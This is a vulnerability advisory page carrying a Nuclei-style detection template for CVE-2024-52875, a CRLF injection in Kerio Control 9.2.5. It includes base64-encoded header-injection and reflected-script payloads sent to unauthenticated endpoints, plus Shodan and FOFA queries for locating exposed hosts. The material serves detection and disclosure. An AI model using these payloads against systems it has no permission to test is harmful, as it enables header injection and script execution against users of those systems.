漏洞描述
Kerio Control, formerly known as Kerio WinRoute Firewall, has been found vulnerable to multiple HTTP Response Splitting vulnerabilities in product affecting versions 9.2.5
CVE-2024-52875: Kerio Control v9.2.5 - CRLF Injection
PoC代码[已公开]
id: CVE-2024-52875
info:
name: Kerio Control v9.2.5 - CRLF Injection
author: ritikchaddha,iamnoooob,rootxharsh,pdresearch
severity: high
description: |
Kerio Control, formerly known as Kerio WinRoute Firewall, has been found vulnerable to multiple HTTP Response Splitting vulnerabilities in product affecting versions 9.2.5
reference:
- https://karmainsecurity.com/hacking-kerio-control-via-cve-2024-52875
- https://nvd.nist.gov/vuln/detail/CVE-2024-52875
classification:
cve-id: CVE-2024-52875
cwe-id: CWE-74
epss-score: 0.86613
epss-percentile: 0.99382
metadata:
verified: true
max-request: 4
shodan-query: "Kerio Control"
fofa-query: "Kerio Control"
tags: cve,cve2024,kerio,crlf,vkev
http:
- method: GET
path:
- "{{BaseURL}}/nonauth/guestConfirm.cs?dest=VGVzdA0KQ1JMRjo%3d"
- "{{BaseURL}}/nonauth/addCertException.cs?dest=VGVzdA0KQ1JMRjo%3d"
- "{{BaseURL}}/nonauth/expiration.cs?dest=VGVzdA0KQ1JMRjo%3d"
- "{{BaseURL}}/nonauth/guestConfirm.cs?dest=Cgo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD4%3d"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
part: header
regex:
- '(?m)^Crlf:\s*$'
- type: dsl
dsl:
- "contains(body,'<script>alert(document.domain)</script>')"
- 'contains(content_type, "text/html")'
- 'contains(location, "")'
- 'status_code == 302'
condition: and
# digest: 4a0a004730450220774b81818443c1dae05a83043dff9fe9f8d8b49eb95b1335a112cdaca41b0dc0022100b8a8f7498370ad8482841535fbfaed30880c28eb1fc0d29d34b48266c91809f2:922c64590222798bb761d5b6d8e72950